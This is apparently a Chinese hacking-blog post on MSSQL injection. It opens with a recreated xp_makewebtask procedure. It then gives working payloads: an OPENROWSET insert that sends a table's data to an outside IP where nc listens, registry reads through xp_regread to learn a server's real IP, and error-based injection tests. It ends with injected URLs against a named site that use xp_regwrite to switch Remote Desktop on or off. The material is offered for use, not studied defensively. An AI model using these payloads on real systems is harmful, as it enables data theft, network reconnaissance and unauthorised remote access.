@procname nvarchar(128) = NULL, -- name to use when making the
-- task and the wrapper/condenser
-- stored procs
@maketask int = 2, -- 0=create unencrypted sproc, no task
-- 1=encrypted sproc and task
-- 2=unencrypted sproc and task
@rowcnt int = 0, -- max no of rows to display
@tabborder tinyint = 1, -- borders around the results table
@singlerow tinyint = 0, -- Single row per page
@blobfmt ntext = NULL, -- Formatting for text and image fields
@nrowsperpage int = 0, -- Results displayed in multiple pages of n rows per page
@datachg ntext = NULL, -- Table and column names for a trigger
[url=https://www.t00ls.net/space-uid-6974.html]@charset[/url] nvarchar(25) = N'utf-8', -- Universal character set is the default
@codepage int = 65001 -- utf-8 (universal) code page is the default
AS
BEGIN
DECLARE @suid smallint
DECLARE @yearchar nvarchar(4)
DECLARE @monthchar nvarchar(2)
DECLARE @daychar nvarchar(2)
DECLARE @hourchar nvarchar(2)
DECLARE @minchar nvarchar(2)
DECLARE @secchar nvarchar(2)
DECLARE @currdate datetime
DECLARE @retval int
-- Check for valid @dbname if supplied
IF (@dbname is NOT NULL)
IF (NOT(exists(SELECT * FROM master..sysdatabases WHERE name = @dbname)))
BEGIN
RAISERROR(16854,11,1)
RETURN (9)
END
-- Make sure that it's the SA executing this.
IF ( NOT ( is_srvrolemember('sysadmin') = 1 ) )
BEGIN
RAISERROR( 15003, -1, -1, 'sysadmin' )
RETURN(1)
END
-- IF not supplied, determine the user executing this procedure
IF (@username is NULL)
BEGIN
SET @username = suser_sname()
IF ( (charindex ('\',@username) > 0) OR (@username is NULL) OR (@username = 'sa') )
BEGIN
SELECT @username = N'dbo'
END
END
-- If not supplied, determine the database currently active
IF (@dbname is NULL)
BEGIN
SELECT @dbname = d.name FROM
master..sysdatabases d, master..sysprocesses p
WHERE d.dbid = p.dbid AND spid = @@spid
END
-- Generate @procname if not supplied
IF (@procname is NULL)
BEGIN
SET @currdate = getdate()
SET @yearchar = convert(nvarchar(4),year(@currdate))
SET @monthchar = right('0'+ rtrim(convert(nvarchar(2),month(@currdate))),2)
SET @daychar = right('0'+rtrim(convert(nvarchar(2),day(@currdate))),2)
SET @hourchar = right('0'+rtrim(convert(nvarchar(2),datepart(hh,@currdate))),2)
SET @minchar = right('0'+rtrim(convert(nvarchar(2),datepart(mi,@currdate))),2)
SET @secchar = right('0'+rtrim(convert(nvarchar(2),datepart(ss,@currdate))),2)
-- Get default procname if not supplied
SET @procname = N'web_'+convert(nchar(14),@yearchar+@monthchar+@daychar+@hourchar+@minchar+@secchar)+convert(nvarchar(20),@@spid)+right(rtrim(convert( VARCHAR(25),RAND() )),4)
END
SET @retval = 0
-- Create the Web task
EXECUTE @retval = sys.xp_makewebtask @outputfile, @query, @username, @procname, @dbname,
@fixedfont, @bold, @italic, @colheaders, @lastupdated, @HTMLheader,
@templatefile, @webpagetitle, @resultstitle, @URL, @reftext,
@table_urls, @url_query, @whentype, @targetdate, @targettime,
@dayflags, @numunits, @unittype, @rowcnt, @maketask, @tabborder,
@singlerow, @blobfmt, @nrowsperpage, @datachg, [url=https://www.t00ls.net/space-uid-6974.html]@charset[/url], @codepage
IF (@retval <> 0)
BEGIN
SET @procname = 'xp_makewebtask'
RAISERROR(@retval, 11, 1, @procname)
END
RETURN @retval
END
其实opendatasource是取数据用的,如果你想得到数据库的IP,根本不需要MSSQL环境就可以得到DATA的IP
用如下语句:
insert into OPENROWSET('SQLOLEDB','uid=test;pwd=test;Network=DBMSSOCN;Address=219.152.120.157,555;', 'select * from dest_table') select * from src_table;--
然后在本机用NC监听8787端口就可以了
另外,用opendatasource取数据的时候要考虑本机带宽等问题!
利用OPENROWSET这个函数也可以拿到数据 并不单单拿到data的IP
关于利用注射点判断数据库web是否分离2009-04-25 13:11来自:皇子
xp/2003系统下注册表里有个键值可以得到真实的ip地址
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\{FBD72F8D-6334-4739-957A-7D324D9C27EF}\Parameters\Tcpip
,在注册表的窗口右边就可发现“IPAddress”、“DefaultGateway”、“SubnetMask”等键值,它们分别对应本机当前配置的IP地址、网关及子网掩码等信息
我们用opendatasource反弹出来的ip始终都是公网ip
即使得到的数据库ip和webip一样 也不能断定数据库web不分离
我可以先建立一个表,把注册表里的真实ip写进去,然后如果是个公网ip而且和反弹结果一样 则断定是数据库web不分离 如果是个内网ip 则观望状态。
具体代码:
insert ku exec master..xp_instance_regenumkeys 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\'
把网卡id写进表ku 中,然后用各种手法读出来,
exec master..xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip'
看看tcpip项下有几个小项
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip','ipaddress'
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip','DefaultGateway'
然后读出每个属性,就知道ip网关了
但是实际操作的时候其实有很多问题,除了xp_regread,上面2个存储过程都是要求sa来调用的,这下还不如直接直接命令然后看结果来的方便简单了,不过难得研究出来了就放这吧,有点鸡肋了.
幸好200(sql2005_inj的作者)给予了一个方案,可以更简洁:
select host_name();得到客户端主机名
select @@servername;得到服务端主机名
暴错时 and host_name()>0--
不暴时配合union all select
或者全部opdatasource反弹回来,查看结果一样就是不分离,不一样的话就是分离
开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;温馨提示:本文最后更新于2018年10月23日 23:44,若内容或图片失效,请在下方留言或联系博主。